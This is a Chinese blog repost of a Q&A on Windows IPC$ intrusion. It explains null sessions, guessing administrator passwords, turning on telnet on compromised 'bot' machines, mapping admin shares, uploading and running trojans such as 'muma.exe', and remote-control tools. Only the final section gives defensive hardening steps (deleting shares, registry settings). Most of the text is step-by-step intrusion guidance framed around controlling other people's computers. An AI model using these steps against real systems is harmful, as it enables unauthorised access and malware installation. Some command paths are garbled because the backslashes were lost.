1）你的权限不够，不能访问默认共享； 

2）对方没有开启admin$默认共享，不要认为能进行ipc$连接，对方就一定开了默认共享（很多人都这么以为，误区！！），此时你可以试试别的默认共享或普通共享，比如c$,d$,c,d等，如果还是不行，就要看你的权限了，如果是管理员权限，你可以开telnet,如果能成功，在给它开共享也行。 


3.如果对方开了IPC$，且能建立空联接，但打开C、D盘时，都要求密码，我知道是空连接没有太多的权限，但没别的办法了吗？ 

答：建议先用流光或者别的什么猜解一下密码，如果猜不出来，只能放弃，毕竟空连接的能力有限。 


4.我已经猜解到了管理员的密码，且已经ipc$连接成功了，但net view \\ip发现它没开默认共享，我该怎么办？ 

答：首先纠正你的一个错误，用net view是无法看到默认共享的。既然你现在有管理员权限，而且对方又开了ipc$,建议你用opentelnet.exe这个小程序打开它的telent,在获得了这个shell之后，做什么都可以了。 


5.ipc$连接成功后，我用下面的命令建立了一个帐户，却发现这个帐户在我自己的机器上，这是怎么回事？ 
net uset ccbirds /add 

答：ipc$建立成功只能说明你与远程主机建立了通信隧道，并不意味你取得了一个shell,只有在获得一个shell之后，你才能在远程建立一个帐户，否则你的操作只是在本地进行。 


6.我已进入了一台肉机，用的管理员帐号，可以看他的系统时间，但是复制程序到他的机子上却不行，每次都提示“拒绝访问，已复制0个文件”，是不是对方有什么服务没开，我该怎么办？ 

答：不能copy文件有多个可能，除了权限不够外，还可能是对方c$,d$等默认管理共享没开，或者是对方为NTFS文件格式，通过设置，管理员也未必能远程写文件。既然你有管理员权限，那就开telnet上去吧，然后在开它的共享。 


7.我用Win98能与对方建立ipc$连接吗？ 

答：不可以的，要进行ipc$的操作，建议用win2000 


8.我用net use \\ip\ipc$ "" /user ""成功的建立了一个空会话，但用nbtstat -A IP 却无法导出用户列表，这是为什么？ 

答：空会话在默认的情况下是可以导出用户列表的，但如果管理员通过修改注册表来禁止导出列表，就会出现你所说的情况；或者你自己的NBT没有打开，netstat是建立在NBT之上的。　　 


9.我建立ipc$连接的时候返回如下信息：‘提供的凭据与已存在的凭据集冲突’，怎么回事？ 

答：呵呵，这说明你与目标主机建立了一个以上的ipc$连接，这是不允许的，把其他的删掉吧：net use \\*.*.*.*\ipc$ /del 


10.我在映射的时候出现： 
F:\>net use h: \\211.161.134.*\e$ 
系统发生 85 错误。 
本地设备名已在使用中。这是怎么回事？ 

答：你也太粗心了吧，这说明你的h盘正在使用，映射到别的盘符吧！ 


11.我建立了一个连接f:\>net use \\*.*.*.*\ipc$ "123" /user:"ccbirds" 成功了，但当我映射时出现了错误，向我要密码，怎么回事？ 
F:\>net use h: \\*.*.*.*\c$ 
密码在 \\*.*.*.*\c$ 无效。 
请键入 \\*.*.*.*\c$ 的密码: 
系统发生 5 错误。 
拒绝访问。 

答：呵呵，向你要密码说明你当前使用的用户权限不够，不能映射C$这个默认共享，想办法提升权限或者找管理员的弱口令吧！默认共享一般是需要管理员权限的。 


12.我用superscan扫到了一个开了139端口的主机，但为什么不能空连接呢？ 
答：你混淆了ipc$与139的关系，能进行ipc$连接的主机一定开了139或445端口，但开这两个端口的主机可不一定能空连接，因为对方可以关闭ipc$共享. 

13.我门局域网里的机器大多都是xp，我用流光扫描到几个administrator帐号口令是空，而且可以连接，但不能复制东西，说错误5。请问为什么？ 

答：xp的安全性要高一些，在安全策略的默认设置中，对本地帐户的网络登录进行身份验证的时候，默认为来宾权限，即使你用管理员远程登录，也只具有来宾权限，因此你复制文件，当然是错误5：权限不够。 

14.我用net use \\192.168.0.2\ipc$ "password" /user:"administrator" 成功，可是 net use i: \\192.168.0.2\c 
出现请键入 \\192.168.0.2 的密码，怎么回事情呢？ 

答：虽然你具有管理员权限，但管理员在设置c盘共享权限时可能并未设置允许administrator访问，所以会出现问题。 

15.如果自己的机器禁止了ipc$, 是不是还可以用ipc连接别的机器？ 
ipc$常见问题

1，怎样建立空连接，它有什么用？ 
答：使用命令 net use \IPipc$ "" /user:"" 就可以简单地和目标建立一个空连接（需要目标开放ipc$）。 
对于NT，在默认安全设置下，借助空连接可以列举目标用户、共享，访问everyone权限的共享，访问小部分注册表等，没有什么利用价值。对2000作用就更小了。而且实现也不方便，需借助工具。

2.为什么我连不上IPC$？ 
答：1.只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。 
2.确认你的命令没有打错。正确的命令是： net use \目标IPipc$ "密码" /user:"用户名" 
注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用""表示。 

3，根据返回的错误号分析原因： 
错误号5，拒绝访问 ： 很可能你使用的用户不是管理员权限的，先提升权限； 
错误号51，Windows 无法找到网络路径 : 网络有问题； 
错误号53，找不到网络路径 ： ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）； 
错误号67，找不到网络名 ： 你的lanmanworkstation服务未启动；目标删除了ipc$； 
错误号1219，提供的凭据与已存在的凭据集冲突 ： 你已经和对方建立了一个ipc$，请删除再连。 
错误号1326，未知的用户名或错误密码 ： 原因很明显了； 
错误号1792，试图登录，但是网络登录服务没有启动 ： 目标NetLogon服务未启动。（连接域控会出现此情况） 
错误号2242，此用户的密码已经过期 ： 目标有帐号策略，强制定期要求更改密码。 

4，关于ipc$连不上的问题比较复杂，没有总结出一个统一的认识，在肉鸡上实验有时会得出矛盾的结论，十分棘手。 而且知道了问题所在，如果没有用其他办法获得shell，很多问题依然不能解决。

5，怎样打开目标的IPC$？ 
答：首先你需要获得一个不依赖于ipc$的shell，比如sql的cmd扩展、telnet、木马。当然，这shell必须是admin权限的。然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上一问题可以知道，ipc$能否使用还有很多条件。请确认相关服务都已运行，没有就启动它（不知道怎么做的请看net命令的用法）。还是不行的话（比如有防火墙，杀不了）建议放弃。 

6，怎样映射和访问默认共享？ 
答：使用命令 net use z: \目标IPc$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘，其他盘类推。 
如果已经和目标建立了ipc$，则可以直接用IP加盘符加$访问。比如 copy muma.exe \IPd$pathmuma.exe 。或者再映射也可以，只是不用用户名和密码了：net use y: \IPd$ 。然后 copy muma.exe y:pathmuma.exe 。当路径中包含空格时，须用""将路径全引住。 

7，如何删除映射和ipc$连接？ 
答：用命令 net use \IPipc$ /del 删除和一个目标的ipc$连接。 
用命令 net use z: /del 删除映射的z盘，其他盘类推。 
用命令 net use * /del 删除全部。会有提示要求按y确认。

8，连上ipc$然后我能做什么？ 
答：能使用管理员权限的帐号成功和目标连接ipc$，表示你可以和对方系统做深入“交流”了。你可以使用各种命令行方式的工具（比如pstools系列、Win2000SrvReskit、telnethack等）获得目标信息、管理目标的进程和服务等。如果目标开放了默认共享（没开你就帮他开），你就可以上传木马并运行。也可以用tftp、ftp的办法上传。像dwrcc、VNC、RemoteAdmin等工具（木马）还具有直接控屏的功能。如果是2000server，还可以考虑开启终端服务方便控制。这里提到的工具的使用，请看自带的说明或相关教程。

9，怎样防止别人用ips$和默认共享入侵我？ 
答：A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。 
1，先把已有的删除 
net share ipc$ /del 
net share admin$ /del 
net share c$ /del 
…………（有几个删几个） 
2，禁止别人空连接 
  首先运行regedit，找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous（DWORD）的键值改为：00000002。 
  3，禁止自动打开默认共享 
  对于server版，找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareServer（DWORD）的键值改为:00000000。 
对于pro版，则是[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks（DWORD）的键值改为:00000000。 
如果上面所说的主键不存在，就新建一个再改键值。 
B、另一种是关闭ipc$和默认共享依赖的服务（不推荐） 
net stop lanmanserver 
可能会有提示说，XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。 
C、最简单的办法是设置复杂密码，防止通过ipc$穷举密码。但如果你有其他漏洞，ipc$将为进一步入侵提供方便。 
D、还有一个办法就是装防火墙，或者端口过滤。

文章来自: 本站原创
Tags: 改版改版 连接连接
相关日志:

特别声明：
① 本站发表的日志仅属个人观点；
② 日志中未注明"禁止转载"字样的文章，如需转载，请注明出处，并且保留此日志的链接；
③ 禁止盗链本站所有图片、软件、影音文件地址；
④ 本站提供下载的资源，仅供参考或测试,下载请自行杀毒。如造成任何不良后果，概不负责；
⑤ 如有任何疑问，请随时与站长联系：webmaster#smoile.com | smoile's网管之路 。
⑥ JPG格式请使用ACDSee工具阅读，PDF格式请使用Adobe Reader阅读，DOC格式请使用Office Word阅读，RAR格式请用WINRAR阅读。
免责声明:
　　此页面提供的文件均通过NOD32杀毒软件扫描无毒，请放心使用，但也烦请您在下载后再查毒一次确保文件安全，如本文件对您的计算机造成危害，本站不负责任。
　　本站所刊载内容均为个人撰写或从网络上收集整理，并且以计算机技术研究交流为目的，仅供大家参考，不存在任何商业用途。不建议您将其当作技术建议或操作引导而根据其直接行事。若您需要技术服务，您应当正式委托专业公司以保障您的合法权益。这些信息有可能不是最新的、官方的信息，也可能是为了研究某一技术问题而援引自他处，可以不经通知而更改。如果本网站内容不慎侵犯了您的版权，请与我联系，我将及时处理，撤下相关内容！